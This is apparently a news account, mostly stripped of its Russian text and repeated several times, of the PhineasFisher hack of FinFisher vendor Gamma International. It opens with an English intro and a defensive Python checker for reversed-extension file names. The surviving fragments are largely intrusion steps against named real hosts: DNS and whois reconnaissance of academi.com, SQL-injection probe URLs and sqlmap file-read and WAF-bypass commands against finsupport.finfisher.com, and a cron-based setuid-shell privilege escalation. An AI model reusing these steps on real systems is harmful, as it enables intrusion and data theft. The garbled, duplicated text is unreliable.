
On August 3, a user named PhineasFisher created a thread on the subreddit r/Anarchism reporting that he had managed to steal 40 gigabytes of assorted data from Gamma International. Such a story might not have attracted much attention were it not for the business this European company is in. A few days after the first message, the cracker posted a long account of how he broke into Gamma International's servers and what he found there.
More about FinFisher
It opens with a short digression and an explanation of why the hacker became interested in Gamma International. In particular, the company distributes the FinFisher software suite, described as a "software solution for intrusion and remote monitoring, created for use by government agencies". Several states, mainly in the Middle East, have been caught negotiating for or using this spyware system, but these facts were never widely publicized or investigated.
Initially the malware reached computers through a hole in iTunes (any third-party program could use the media center's auto-update mechanism, with all the operations that made possible and everything that followed from them), which Apple left open for more than three years.
In 2012, many Bahraini opposition activists received emails with an attachment: a .rar archive containing photos and other documents. A multi-purpose Trojan thus made its way onto their computers. A file name such as exe.Image.jpg looks "correct" at first glance, but on systems localized for Arab countries, which write right to left, it was meant to be displayed as gpj.egamI.exe, and the files turned out to be executables rather than images. Members of CitizenLab took on the investigation of this attack.
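As an added, defender-oriented example that is not part of the original article or of CitizenLab's analysis: a small Python checker that flags file names containing Unicode bidirectional control characters (the mechanism behind the reversed-extension lure described above) and reports the extension the operating system will actually use. The sample names are constructed; the single-RLO form Image\u202Egpj.exe illustrates the trick and is not the file name from the campaign, and the list of executable extensions is an assumption, not something the article states.

```python
"""Flag file names that use Unicode bidi control characters to disguise their extension.

Added example, not code from the original article. Sample file names below are constructed.
"""
from __future__ import annotations

import unicodedata

# Bidirectional control characters that can reorder how a name is displayed.
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",  # LRE, RLE, PDF, LRO, RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI, RLI, FSI, PDI
    "\u200e", "\u200f",                                # LRM, RLM
}

# Extensions a mail gateway or endpoint agent would treat as directly executable (assumed list).
EXECUTABLE_EXTENSIONS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs", "hta"}


def find_bidi_controls(name: str) -> list[tuple[int, str]]:
    """Return (position, Unicode name) for each bidi control character in the name."""
    return [(i, unicodedata.name(ch)) for i, ch in enumerate(name) if ch in BIDI_CONTROLS]


def real_extension(name: str) -> str:
    """Extension the OS actually uses: text after the last '.' in the raw string, controls ignored."""
    cleaned = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    _, dot, ext = cleaned.rpartition(".")
    return ext.lower() if dot else ""


def displayed_name(name: str) -> str:
    """Approximate what a user sees: text after U+202E (RLO) is drawn reversed until U+202C (PDF).

    This is a simplification of the Unicode bidi algorithm, enough to show the lure.
    """
    head, rlo, tail = name.partition("\u202e")
    if not rlo:
        return name
    overridden, _, rest = tail.partition("\u202c")
    return head + overridden[::-1] + rest


def assess(name: str) -> dict:
    """Summarise the risk of one file name."""
    controls = find_bidi_controls(name)
    ext = real_extension(name)
    return {
        "name": name,
        "displayed_as": displayed_name(name),
        "real_extension": ext,
        "bidi_controls": controls,
        # Any bidi control in a file name is abnormal; flag it regardless of extension.
        "suspicious": bool(controls),
        # The combination used in the lure: the displayed name hides an executable extension.
        "disguised_executable": bool(controls) and ext in EXECUTABLE_EXTENSIONS,
    }


# Constructed sample names: an RLO lure, a harmless image, and an Arabic name with a plain RLM.
SAMPLE_NAMES = [
    "Image\u202egpj.exe",   # displayed as Imageexe.jpg, really an .exe
    "holiday_photo.jpg",    # clean
    "\u200f\u062a\u0642\u0631\u064a\u0631.pdf",  # RLM present, but the real extension is .pdf
]

if __name__ == "__main__":
    for sample in SAMPLE_NAMES:
        result = assess(sample)
        print(f"{result['displayed_as']!r:32} ext={result['real_extension']:5} "
              f"suspicious={result['suspicious']} disguised_executable={result['disguised_executable']}")
```

The check deliberately separates "contains a bidi control" (abnormal in any file name, worth a quarantine rule on a mail gateway) from "disguises an executable" (the specific lure), so that legitimate right-to-left names with a stray mark are reviewed rather than blocked outright.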

The Trojan was copied to the folder C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com
67.238.84.228 email.academi.com
67.238.84.242 extranet.academi.com
67.238.84.240 mail.academi.com
67.238.84.230 secure.academi.com
67.238.84.227 vault.academi.com
54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255
CIDR: 67.238.84.224/27
CustName: Blackwater USA
Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com
67.132.195.12 academiproshop.com
67.238.84.236 te.academi.com
67.238.84.238 property.academi.com
67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
 ___________
< got r00t? >
 -----------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/
http://overthewire.org/wargames/
http://www.hackthissite.org/
http://smashthestack.org/
http://www.win.tue.nl/~aeb/linux/hh/hh.html
http://www.phrack.com/
http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
https://www.corelan.be/ (Exploit writing tutorial part 1)
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook
Hacking: The Art of Exploitation
The Database Hacker's Handbook
The Art of Software Security Assessment
A Bug Hunter's Diary
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
